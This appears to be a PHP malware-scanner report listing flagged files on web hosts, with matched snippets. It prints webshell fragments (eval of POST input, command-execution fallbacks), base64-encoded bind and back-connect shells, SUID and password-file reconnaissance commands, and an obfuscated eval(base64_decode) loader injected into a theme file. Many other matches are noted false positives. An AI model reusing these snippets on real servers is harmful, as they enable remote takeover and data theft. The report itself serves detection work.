"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHR...
| Exploit base64_long Line: 1579 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWR...
| Exploit basedir_bypass Dangerous Basedir bypass, used to manipulate files or execute code outside the base directory set in the server configuration |
curl_init("file://".$_POST['p2']." ".SELF_PATH)
| Exploit basedir_bypass Line: 1063 Dangerous Basedir bypass, used to manipulate files or execute code outside the base directory set in the server configuration |
curl_init("file://".$_POST['p2']."\x00".SELF_PATH)
| Exploit download_remote_code2 Line: 518 Dangerous RFU (Remote File Upload) via HTTP, which allows malicious code to be written to the target machine |
fwrite($fp,$_POST['p3'])
| Exploit etc_passwd Line: 390 Dangerous The `/etc/passwd` file on Unix systems contains password information; an attacker who has accessed the `/etc/passwd` file may attempt a brute-force attack on all passwords on the system |
/etc/passwd
| Exploit etc_shadow Line: 391 Dangerous The `/etc/shadow` file on Unix systems contains password information; an attacker who has accessed the `/etc/shadow` file may attempt a brute-force attack on all passwords on the system |
/etc/shadow
| Exploit execution Line: 1069 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_POST['p2'])
| Exploit execution Line: 350 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval($_POST['p1'])
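| Exploit php_uname Line: 184 Dangerous RCE (Remote Code Execution) allows remote attackers to execute arbitrary commands or code on the target machine (`php_uname()` itself only reports operating-system details; read the match as a host-reconnaissance indicator and judge it together with the other findings for this file) |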
php_uname('r')
| Exploit php_uname Line: 185 Dangerous RCE (Remote Code Execution) allows remote attackers to execute arbitrary commands or code on the target machine |
php_uname('s')
| Exploit var_as_func Line: 989 Dangerous RCE (Remote Code Execution) and Code Injection, through global variables used as a PHP function name, allow remote attackers to execute PHP code on the target machine via an HTTP request |
$_POST['p1']($_POST['p2'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_to...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS['c...
| Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] |
passthru($in); $▖ = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $▖ = ob_get_clean(); } elseif (function_exists('shell_exec')) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while(!@feof($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 107374182...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charset...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while(!@feof($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } funct...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($in); $▖ = ob_get_clean(); } elseif (function_exists('shell_exec')) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while(!@feof($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($...
| Sign 00f56a27 Line: 989 Dangerous Malware Signature (hash: 00f56a27) |
$_POST['p1']($_POST['p2'])
| Sign 03ce9d9e Line: 632 Dangerous Malware Signature (hash: 03ce9d9e) |
proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.in...
| Sign 085a0329 Line: 603 Dangerous Malware Signature (hash: 085a0329) |
ipconfig
| Sign 0f37c730 Line: 1040 Dangerous Malware Signature (hash: 0f37c730) |
md5decrypter.com
| Sign 11413268 Line: 186 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 11413268 Line: 232 Dangerous Malware Signature (hash: 11413268) |
Exploit
| Sign 11413268 Line: 350 Dangerous Malware Signature (hash: 11413268) |
eval($_POST
| Sign 162cf671 Line: 1034 Dangerous Malware Signature (hash: 162cf671) |
hashcrack
| Sign 19ee5b66 Line: 649 Dangerous Malware Signature (hash: 19ee5b66) |
.mysql_history
| Sign 43b0d90f Line: 989 Dangerous Malware Signature (hash: 43b0d90f) |
echo $_POST['p1']($_POST['p2']
| Sign 471b95ee Line: 1560 Dangerous Malware Signature (hash: 471b95ee) |
SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`)
| Sign 471b95ee Line: 48 Dangerous Malware Signature (hash: 471b95ee) |
Slurp", "MSNBot
| Sign 4a069524 Line: 1576 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 4a069524 Line: 48 Dangerous Malware Signature (hash: 4a069524) |
array("Google", "Slurp"
| Sign 664602fe Line: 1039 Dangerous Malware Signature (hash: 664602fe) |
fopo.com.ar
| Sign 664602fe Line: 612 Dangerous Malware Signature (hash: 664602fe) |
find / -type f -perm -04000 -ls
| Sign 664602fe Line: 613 Dangerous Malware Signature (hash: 664602fe) |
find . -type f
| Sign 664602fe Line: 614 Dangerous Malware Signature (hash: 664602fe) |
find / -type f -perm -02000 -ls
| Sign 664602fe Line: 623 Dangerous Malware Signature (hash: 664602fe) |
find / -type f -name .htpasswd
| Sign 7186bb8d Line: 396 Dangerous Malware Signature (hash: 7186bb8d) |
rootkit
| Sign 77f25ab1 Line: 64 Dangerous Malware Signature (hash: 77f25ab1) |
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
| Sign 7830f7a6 Line: 1577 Dangerous Malware Signature (hash: 7830f7a6) |
N5c3Rlb
| Sign 7830f7a6 Line: 598 Dangerous Malware Signature (hash: 7830f7a6) |
netstat -an
| Sign 7e44169a Line: 395 Dangerous Malware Signature (hash: 7e44169a) |
$userful = array('gcc','lcc','cc','ld
| Sign 7f5d33bf Line: 1576 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign 91535293 Line: 1576 Dangerous Malware Signature (hash: 91535293) |
luY2x1ZG
| Sign 963e968a Line: 1578 Dangerous Malware Signature (hash: 963e968a) |
pbmNsdWRl
| Sign 963e968a Line: 232 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a408f408 Line: 1576 Dangerous Malware Signature (hash: a408f408) |
c2l6ZW9m
| Sign a408f408 Line: 1631 Dangerous Malware Signature (hash: a408f408) |
call_user_func('action' . $_POST[
| Sign ae7830db Line: 1577 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign b236d073 Line: 390 Dangerous Malware Signature (hash: b236d073) |
/etc/passwd
| Sign b236d073 Line: 391 Dangerous Malware Signature (hash: b236d073) |
/etc/shadow
| Sign d30fc49e Line: 1579 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 1576 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign d97f004d Line: 1579 Dangerous Malware Signature (hash: d97f004d) |
ZGVmaW5l
| Sign de12c454 Line: 1577 Dangerous Malware Signature (hash: de12c454) |
vcGVu
| Sign ee1cb326 Line: 1577 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
| Sign f9dc0a55 Line: 964 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
//var/www/intimdosugsex/data/www/themes/sketch/header.php Size: 3.25 kB Created: 2021-06-06 00:59:52 Modified: 2021-06-06 00:59:52 Warns: 2 Dangers: 10
| Description | Match |
|---|
Exploit base64_long Line: 9 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRtWzNdLiRpMi4kbVs0XS4...
| Exploit eval_base64 Line: 9 Dangerous RCE (Remote Code Execution) through Base64-encoded text allows remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Exploit execution Line: 9 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Sign 0f37c730 Line: 9 Dangerous Malware Signature (hash: 0f37c730) |
mdW5jdGlvb
| Sign 11413268 Line: 9 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode('JGY9ZGlybmFtZShfX2ZpbGVfXykuJy9pbWFnZXMvd3BfbWVudV90b3AucG5nJzskYj1nZXRfb3B0aW9uKCd3cF90aGVtZV9tZW51X2ZpcnN0Jyk7aWYgKGZpbGVfZXhpc3RzKCRmKSBhbmQgISRiKXskZnAgPSBmb3BlbigkZiwiciIpOyRzID0gZnJlYWQoJGZwLGZpbGVzaXplKCRmKSk7ZmNsb3NlKCRmcCk7ZXZhbCgnJG09Jy5nenVuY29tcHJlc3Moc3RyaXBzbGFzaGVzKCRzKSkuJzsnKTskaTA9JG1bMF07JGkxPSRtWzFdOyRpMj0kbVsyXTskaTM9JG1bM107dW5zZXQoJG1bMF0sJG1bMV0sJG1bMl0pO3NodWZmbGUoJG0pOyRjc1swXT0kaTAuJGkxLiRtWzBdLiRpMi4kbVsxXS4kaTIuJG1bMl0uJGkzOyRjc1sxXT0kaTAuJGkxLiRt...
| Sign 7830f7a6 Line: 9 Dangerous Malware Signature (hash: 7830f7a6) |
Nsb3Nl
| Sign 7f5d33bf Line: 9 Dangerous Malware Signature (hash: 7f5d33bf) |
JF9HRV
| Sign 80e70adc Line: 9 Dangerous Malware Signature (hash: 80e70adc) |
<?php eval
| Sign d30fc49e Line: 9 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 9 Dangerous Malware Signature (hash: d97f004d) |
ZWNob
| Sign e6546205 Line: 9 Dangerous Malware Signature (hash: e6546205) |
kX0dFV
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/profile-builder-pro/add-ons/user-listing/userlisting.php Size: 136.84 kB Created: 2021-04-21 14:59:26 Modified: 2021-04-21 14:59:26 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1228 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/profile-builder-pro/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2021-04-21 14:59:34 Modified: 2021-04-21 14:59:34 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-11-21 21:41:11 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Warns: 1
| Description | Match |
|---|
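Function system Warning Potentially dangerous function `system` [https://www.php.net/system]; the match below is the English word "system" followed by a parenthesis inside a translatable message string, not a function call |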
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 2
| Description | Match |
|---|
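Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]; in the match below `array_filter()` receives only `$allPatterns` and `$_GET` appears in a later `array_key_exists()` check, so no request data reaches a callback in the excerpt shown |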
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:21:31 Modified: 2021-05-16 20:21:31 Warns: 1
| Description | Match |
|---|
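Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]; the match below is the string `exec(` inside a list of quoted method names (`'test('`, `'toSource('`, `'toString('`), not a PHP call |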
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 5
| Description | Match |
|---|
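Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]; the match below is a variable-function call indexed by a `PCLZIP_CB_*` constant, which looks like callback dispatch, so compare the file with the upstream library before treating it as a webshell |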
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 5
| Description | Match |
|---|
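Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells that are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] Note: the rule fired here on a variable-function call whose callee is looked up in `$p_options` under a PclZip callback constant, not on request input; compare the file with the vendor's pclzip.lib.php before treating it as a webshell. |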
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
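| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) Note: the matched text is only a call to PHP's built-in `php_uname()`, which by itself does not show malicious behaviour; check the code around line 5166. |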
php_uname()
|
|
